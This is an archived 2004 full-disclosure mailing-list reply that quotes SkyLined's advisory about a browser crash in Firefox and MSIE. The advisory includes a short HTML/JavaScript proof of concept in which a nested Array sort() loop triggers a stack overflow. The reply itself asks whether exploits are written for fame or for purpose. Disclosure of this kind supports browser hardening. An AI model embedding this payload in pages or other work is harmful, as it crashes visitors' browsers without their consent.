[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <200411252314.iAPNED100411@netsys.com>
From: randallm at fidmail.com (RandallM)
Subject: FIREFOX flaws: nested array sort()
So, where do you all stand. Exploit for fame or for purpose?
> -----Original Message-----
> From: full-disclosure-admin@...ts.netsys.com
> [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of
> Berend-Jan Wever
> Sent: 25 November 2004 01:05
> To: full-disclosure@...ts.netsys.com;
> vuln-dev@...urityfocus.com; bugtraq@...urityfocus.com
> Subject: [Full-Disclosure] FIREFOX flaws: nested array sort()
> loop Stack overflow exception
>
> Hi all,
>
> Same flaw works for Firefox as well as MSIE:
>
> <HTML>
> <SCRIPT> a = new Array(); while (1) { (a = new
> Array(a)).sort(); } </SCRIPT>
> <SCRIPT> a = new Array(); while (1) { (a = new
> Array(a)).sort(); } </SCRIPT> </HTML>
>
> Added to the list:
> http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html
>
> I'd have loved to CC mozilla about this, but I didn't have
> the time to do the crash course "how to write a bug report"
> and go through all that bugzilla crap.
>
> Cheers,
> SkyLined
> http://www.edup.tudelft.nl/~bjwever
Randall M
________________
Powered by blists - more mailing lists